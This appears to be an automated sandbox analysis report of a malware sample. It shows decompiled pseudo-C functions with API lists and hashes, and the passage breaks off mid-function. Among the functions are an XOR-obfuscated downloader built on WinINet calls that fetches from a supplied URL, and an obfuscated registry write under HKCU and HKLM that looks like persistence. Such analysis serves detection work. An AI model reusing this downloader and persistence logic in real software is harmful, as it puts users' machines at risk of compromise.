Opcode ID: 9b7ff3f4d2b75643da11ce1471ee6fcd57b24d46dc5c096a22b1a82914422071
Instruction ID: 77a263f29e397150c92deeb4dd5dd81ea7e17c4763331a2b9618210a2b7894de
Opcode Fuzzy Hash: 9b7ff3f4d2b75643da11ce1471ee6fcd57b24d46dc5c096a22b1a82914422071
Instruction Fuzzy Hash: 8711D33124C241AFD7219B20CC59BFB7BE9EB46718F00049DF985C7290EF758A09D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B622B6, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B622B6(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_t176 =  *((intOrPtr*)(0xb6a6c8 + _t246 * 4));
				_v80 = _t282;
				_t10 = _t176 + 0x18; // 0x8458b01
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 + _t10));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00B519CE( &_v72, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xb6a6c8 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xb691d8)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0xb691d8)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E00B4D670( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00B63A20(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E00B5A975(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00B55632();
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E00B5FAC5( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E00B5FAC5();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00B4AE43(_v8 ^ _t294);
			}

APIs

GetConsoleCP.KERNEL32(8304488B,00B513E1,00000000), ref: 00B622FE
__fassign.LIBCMT ref: 00B624DD
__fassign.LIBCMT ref: 00B624FA
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B62542
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B62582
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B6262E

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 69a8f322771d2d734614c16c5da284bc0bf164473563b0f716fdd44ae6b18b8d
Instruction ID: 8cfb461868226d8d41bac1ca454f3ed6a3c9d9291a317b104be7f8a4350892eb
Opcode Fuzzy Hash: 69a8f322771d2d734614c16c5da284bc0bf164473563b0f716fdd44ae6b18b8d
Instruction Fuzzy Hash: 59D19971D016589FDF15CFA8C8809EDBBF5FF48304F2801AAE856BB352D635AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B489B2, Relevance: 9.1, APIs: 6, Instructions: 108
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00B489B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, char* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v72;
				char _v2005;
				intOrPtr _v2008;
				void _v2048;
				char _v2064;
				char _v2120;
				intOrPtr _v2124;
				void* _v2132;
				long _v2176;
				intOrPtr _v2188;
				void* _v2192;
				signed int _t26;
				char* _t51;
				char* _t53;
				void* _t60;
				char* _t63;
				void* _t64;
				void _t68;
				signed int _t70;

				_t70 =  &_v2132;
				_t26 =  *0xb69014; // 0x7e8b4fb6
				_v4 = _t26 ^ _t70;
				asm("movaps xmm0, [0xb3dc00]");
				asm("movups [esp+0xc], xmm0");
				asm("movaps xmm0, [0xb3dd50]");
				_t51 = 0;
				asm("movups [esp+0x20], xmm0");
				_t53 = 0;
				_v2124 = _a8;
				asm("movaps xmm0, [0xb3dd80]");
				asm("movups [esp+0x30], xmm0");
				asm("movaps xmm0, [0xb3dd70]");
				_t68 = 0;
				asm("movups [esp+0x44], xmm0");
				asm("movaps xmm0, [0xb3df10]");
				_t63 = _a4;
				asm("movups [esp+0x58], xmm0");
				asm("movaps xmm0, [0xb3df20]");
				asm("movups [esp+0x6c], xmm0");
				_v2132 = 0;
				asm("movaps xmm0, [0xb3df00]");
				asm("movups [esp+0x7c], xmm0");
				_v2008 = 0x84829e;
				do {
					_t7 = _t53 + 0x40; // 0x40
					 *(_t70 + _t53 + 0x1c) =  *(_t70 + _t53 + 0x1c) ^ _t7;
					_t53 = _t53 + 1;
				} while (_t53 < 0x73);
				_v2005 = 0;
				_t60 = InternetOpenA( &_v2120, 0, 0, 0, 0);
				if(_t60 != 0) {
					_t64 = InternetOpenUrlA(_t60, _t63, 0, 0, 0x84000000, 0);
					__eflags = _t64;
					if(__eflags != 0) {
						do {
							InternetReadFile(_t64,  &_v2048, 0x7d0,  &_v2176);
							_push(_v2192 + _t68);
							_v2188 = E00B4B0B6(__edx, __eflags);
							E00B4D670(_t38, _t51, _t68);
							E00B4D670(_v2188 + _t68,  &_v2064, _v2192);
							L00B4AE54(_t51);
							_t68 = _v2192 + _t68;
							_t70 = _t70 + 0x20;
							__eflags = _v2192;
							_t51 = _v2188;
						} while (__eflags != 0);
						InternetCloseHandle(_t64);
						InternetCloseHandle(_t60);
						 *_v2192 = _t68;
					} else {
						InternetCloseHandle(_t60);
						goto L3;
					}
				} else {
					L3:
				}
				return E00B4AE43(_v72 ^ _t70);
			}

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00B48A62
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000000,00000000), ref: 00B48A7F
InternetCloseHandle.WININET(00000000), ref: 00B48A8C
InternetReadFile.WININET(00000000,?,000007D0,?), ref: 00B48AA7
InternetCloseHandle.WININET(00000000), ref: 00B48AFC
InternetCloseHandle.WININET(00000000), ref: 00B48AFF

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: ec8b371fff68386fcbfb5ac6d7945c1995d3521921ba3ece5b772a9bcab27bd7
Instruction ID: d9a69031cbca952dc9939bad59f4c877ba666d513c67f077c900a5cd4f4e1321
Opcode Fuzzy Hash: ec8b371fff68386fcbfb5ac6d7945c1995d3521921ba3ece5b772a9bcab27bd7
Instruction Fuzzy Hash: 264172719087449BD311DF29DC80AAFF7E8FF99308F01591DF98853121EF74AA948B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B49B90, Relevance: 9.1, APIs: 6, Instructions: 99
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B49B90(void* __ebx, void* __esi, char* _a4, char* _a8) {
				signed int _v8;
				char _v11;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v56;
				void* _v60;
				char* _v64;
				signed int _t37;
				char _t43;
				char _t50;
				char* _t55;
				int _t58;
				char* _t59;
				int _t61;
				char* _t62;
				char* _t67;
				char* _t69;
				char* _t71;
				signed int _t73;

				_t37 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t37 ^ _t73;
				asm("movaps xmm0, [0xb3dbe0]");
				_t55 = _a8;
				_t58 = 0;
				asm("movups [ebp-0x34], xmm0");
				asm("movaps xmm0, [0xb3ddb0]");
				_t71 = _a4;
				_v64 = _t55;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x634150e;
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t9 = _t58 + 0x40; // 0x40
					 *(_t73 + _t58 - 0x34) =  *(_t73 + _t58 - 0x34) ^ _t9;
					_t58 = _t58 + 1;
				} while (_t58 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000001,  &_v56, 0, 2,  &_v60);
				_t59 = _t71;
				_t17 =  &(_t59[1]); // 0x1
				_t67 = _t17;
				do {
					_t43 =  *_t59;
					_t59 =  &(_t59[1]);
				} while (_t43 != 0);
				RegSetValueExA(_v60, _t55, 0, 1, _t71, _t59 - _t67);
				RegCloseKey(_v60);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x34], xmm0");
				_t61 = 0;
				_v24 = 0x634150e;
				asm("movaps xmm0, [0xb3ddb0]");
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t24 = _t61 + 0x40; // 0x40
					 *(_t73 + _t61 - 0x34) =  *(_t73 + _t61 - 0x34) ^ _t24;
					_t61 = _t61 + 1;
				} while (_t61 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000002,  &_v56, 0, 2,  &_v60);
				_t62 = _t71;
				_t32 =  &(_t62[1]); // 0x1
				_t69 = _t32;
				do {
					_t50 =  *_t62;
					_t62 =  &(_t62[1]);
				} while (_t50 != 0);
				RegSetValueExA(_v60, _v64, 0, 1, _t71, _t62 - _t69);
				RegCloseKey(_v60);
				return E00B4AE43(_v8 ^ _t73);
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000002,?,00000000,00000000), ref: 00B49C00
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C24
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C29
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C84
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA4
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA9

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 4f7b7473b4cc6d9043940f183820f1030b2edce1b8c56c8fd4299076f2777055
Instruction ID: 8aa777a3e5d85021cfd53395fb2881dfead91ff96be0ce980c49b1a1bc126219
Opcode Fuzzy Hash: 4f7b7473b4cc6d9043940f183820f1030b2edce1b8c56c8fd4299076f2777055
Instruction Fuzzy Hash: F8418074905248BAEB05CFA4ED84AFDBBB9EF49308F108158F94167262EB715A85CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B542A7, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B542A7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed int _t240;
				void* _t243;
				signed int _t246;
				signed int _t248;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t272;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				intOrPtr _t292;
				signed int _t295;
				signed int _t296;
				signed int _t298;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t327;
				void* _t329;
				signed int _t331;
				void* _t332;
				intOrPtr _t333;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t344;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr* _t375;
				intOrPtr* _t378;
				void* _t381;
				signed int _t382;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t395;
				intOrPtr _t398;
				intOrPtr* _t399;
				signed int _t401;
				signed int* _t405;
				signed int _t406;
				intOrPtr* _t412;
				intOrPtr* _t413;
				signed int _t421;
				signed int _t422;
				short _t423;
				void* _t424;
				void* _t426;
				signed int _t427;
				signed int _t429;
				intOrPtr _t430;
				signed int _t433;
				intOrPtr _t434;
				signed int _t436;
				signed int _t439;
				intOrPtr _t445;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int* _t459;
				intOrPtr* _t460;
				short _t461;
				void* _t463;
				signed int _t465;
				signed int _t467;
				void* _t469;
				void* _t470;
				void* _t472;
				signed int _t473;
				void* _t474;
				void* _t476;
				signed int _t477;
				void* _t479;
				void* _t481;
				signed int _t493;

				_t421 = __edx;
				_t463 = _t469;
				_t470 = _t469 - 0x10;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t358 = E00B56F1C(0x6a6);
				_t239 = 0;
				if(_t358 == 0) {
					L20:
					return _t239;
				} else {
					_push(__edi);
					_t2 = _t358 + 4; // 0x4
					_t429 = _t2;
					 *_t429 = 0;
					 *_t358 = 1;
					_t445 = _a4;
					_t240 = _t445 + 0x30;
					_push( *_t240);
					_v16 = _t240;
					_push(0xb34e28);
					_push( *0xb34d64);
					E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
					_t472 = _t470 + 0x18;
					_v8 = 0xb34d64;
					while(1) {
						L2:
						_t243 = E00B59764(_t429, 0x351, 0xb34e24);
						_t473 = _t472 + 0xc;
						if(_t243 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t412 = _t8;
							_t338 =  *_v16;
							_v16 = _t412;
							_t413 =  *_t412;
							_v20 = _t413;
							goto L4;
						}
						while(1) {
							L4:
							_t421 =  *_t338;
							if(_t421 !=  *_t413) {
								break;
							}
							if(_t421 == 0) {
								L8:
								_t339 = 0;
							} else {
								_t421 =  *((intOrPtr*)(_t338 + 2));
								if(_t421 !=  *((intOrPtr*)(_t413 + 2))) {
									break;
								} else {
									_t338 = _t338 + 4;
									_t413 = _t413 + 4;
									if(_t421 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xb34e28);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t339);
							_t344 = _v8 + 0xc;
							_v8 = _t344;
							_push( *_t344);
							E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
							_t472 = _t473 + 0x18;
							if(_v8 < 0xb34d94) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00B564B8(_t358);
									_t436 = _t429 | 0xffffffff;
									__eflags =  *(_t445 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									__eflags =  *(_t445 + 0x24);
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t436 == 1;
										if(_t436 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) = 0;
									 *(_t445 + 0x1c) = 0;
									 *(_t445 + 0x28) = 0;
									 *((intOrPtr*)(_t445 + 0x20)) = 0;
									_t239 =  *((intOrPtr*)(_t445 + 0x40));
								} else {
									_t439 = _t429 | 0xffffffff;
									_t493 =  *(_t445 + 0x28);
									if(_t493 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t493 == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t439 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) =  *(_t445 + 0x24) & 0x00000000;
									_t28 = _t358 + 4; // 0x4
									_t239 = _t28;
									 *(_t445 + 0x1c) =  *(_t445 + 0x1c) & 0x00000000;
									 *(_t445 + 0x28) = _t358;
									 *((intOrPtr*)(_t445 + 0x20)) = _t239;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t339 = _t338 | 0x00000001;
						__eflags = _t339;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
					_push(_t463);
					_t465 = _t473;
					_t474 = _t473 - 0x1d0;
					_t246 =  *0xb69014; // 0x7e8b4fb6
					_v60 = _t246 ^ _t465;
					_t248 = _v44;
					_push(_t358);
					_push(_t445);
					_t446 = _v40;
					_push(_t429);
					_t430 = _v48;
					_v512 = _t430;
					__eflags = _t248;
					if(_t248 == 0) {
						_v460 = 1;
						_v468 = 0;
						_t360 = 0;
						_v452 = 0;
						__eflags = _t446;
						if(__eflags == 0) {
							L79:
							E00B542A7(_t360, _t421, _t430, _t446, __eflags, _t430);
							goto L80;
						} else {
							__eflags =  *_t446 - 0x4c;
							if( *_t446 != 0x4c) {
								L59:
								_t254 = E00B53E03(_t360, _t430, _t446, _t446,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t476 = _t474 + 0x18;
								__eflags = _t254;
								if(_t254 != 0) {
									__eflags = 0;
									_t422 = _t430 + 0x20;
									_t448 = 0;
									_v452 = _t422;
									do {
										__eflags = _t448;
										if(_t448 == 0) {
											L74:
											_t255 = _v460;
										} else {
											_t375 =  *_t422;
											_t256 =  &_v276;
											while(1) {
												__eflags =  *_t256 -  *_t375;
												_t430 = _v464;
												if( *_t256 !=  *_t375) {
													break;
												}
												__eflags =  *_t256;
												if( *_t256 == 0) {
													L67:
													_t257 = 0;
												} else {
													_t423 =  *((intOrPtr*)(_t256 + 2));
													__eflags = _t423 -  *((intOrPtr*)(_t375 + 2));
													_v454 = _t423;
													_t422 = _v452;
													if(_t423 !=  *((intOrPtr*)(_t375 + 2))) {
														break;
													} else {
														_t256 = _t256 + 4;
														_t375 = _t375 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t257;
												if(_t257 == 0) {
													_t360 = _t360 + 1;
													__eflags = _t360;
													goto L74;
												} else {
													_t258 =  &_v276;
													_push(_t258);
													_push(_t448);
													_push(_t430);
													L83();
													_t422 = _v452;
													_t476 = _t476 + 0xc;
													__eflags = _t258;
													if(_t258 == 0) {
														_t255 = 0;
														_v460 = 0;
													} else {
														_t360 = _t360 + 1;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t257 = _t256 | 0x00000001;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t448 = _t448 + 1;
										_t422 = _t422 + 0x10;
										_v452 = _t422;
										__eflags = _t448 - 5;
									} while (_t448 <= 5);
									__eflags = _t255;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t360;
										if(__eflags != 0) {
											goto L79;
										} else {
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t446 + 2) - 0x43;
								if( *(_t446 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t446 + 4)) - 0x5f;
									if( *((short*)(_t446 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t260 = E00B5BE10(_t446, 0xb34e1c);
											_t362 = _t260;
											_v472 = _t362;
											_pop(_t377);
											__eflags = _t362;
											if(_t362 == 0) {
												break;
											}
											_t262 = _t260 - _t446;
											__eflags = _t262;
											_v460 = _t262 >> 1;
											if(_t262 == 0) {
												break;
											} else {
												_t264 = 0x3b;
												__eflags =  *_t362 - _t264;
												if( *_t362 == _t264) {
													break;
												} else {
													_t433 = _v460;
													_t363 = 0xb34d64;
													_v456 = 1;
													do {
														_t265 = E00B563DD( *_t363, _t446, _t433);
														_t474 = _t474 + 0xc;
														__eflags = _t265;
														if(_t265 != 0) {
															goto L45;
														} else {
															_t378 =  *_t363;
															_t424 = _t378 + 2;
															do {
																_t333 =  *_t378;
																_t378 = _t378 + 2;
																__eflags = _t333 - _v468;
															} while (_t333 != _v468);
															_t377 = _t378 - _t424 >> 1;
															__eflags = _t433 - _t378 - _t424 >> 1;
